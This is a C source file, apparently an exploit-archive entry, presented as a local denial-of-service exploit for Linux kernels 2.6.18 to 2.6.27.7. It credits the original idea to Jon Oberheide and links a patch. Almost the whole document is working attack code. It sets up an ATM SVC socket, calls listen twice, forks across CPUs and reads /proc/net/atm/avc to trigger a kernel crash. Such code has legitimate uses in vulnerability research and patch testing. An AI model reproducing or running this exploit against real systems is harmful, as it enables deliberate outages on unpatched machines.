Linux Kernel 2.6.27.7-generic - 2.6.18 - 2.6.24-1 local denial of service exploit.
004debba5a6184e181e4a4e6fc07f21c8627c6fb67bd00a3ee817ea7c6ae223a
/*
Linux Kernel 2.6.27.7-generic - 2.6.18 - 2.6.24-1 Dos Exploit
ariginal idéé : Jon Oberheide łł
http://www.milw0rm.com/exploits/7405
tested : 2.6.27.7-generic - 2.6.18 - 2.6.24-1
by : ADU-T
patching :
http://marc.info/?l=linux-netdev&m=122841256115780&w=2
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <linux/atm.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/stat.h>
#define NUM_CPUS 8
#define ATM "/proc/net/atm/avc"
int
main(void)
{
char *err, adurit[2000];
int i, ret, sock, proc;
struct atm_qos dj;
struct sockaddr_atmsvc addr;
sock = socket(PF_ATMSVC, SOCK_DGRAM, 0);
memset(&dj, 0, sizeof(dj));
dj.rxtp.traffic_class = ATM_UBR;
dj.txtp.traffic_class = ATM_UBR;
dj.aal = ATM_NO_AAL;
ret = setsockopt(sock, SOL_ATM, SO_ATMQOS, &dj, sizeof(dj));
if (ret == -1) {
printf("failed !\n");
return 1;
}
memset(&addr, 0, sizeof(addr));
addr.sas_family = AF_ATMSVC;
bind(sock, (struct sockaddr *) &addr, sizeof(addr));
listen(sock, 10);
listen(sock, 10);
for (i = 1; i < NUM_CPUS; ++i) {
if (fork() != 0) {
break;
}
}
proc = open(ATM, O_RDONLY);
ret = read(proc, &adurit, 2000);
close(proc);
return 0;
}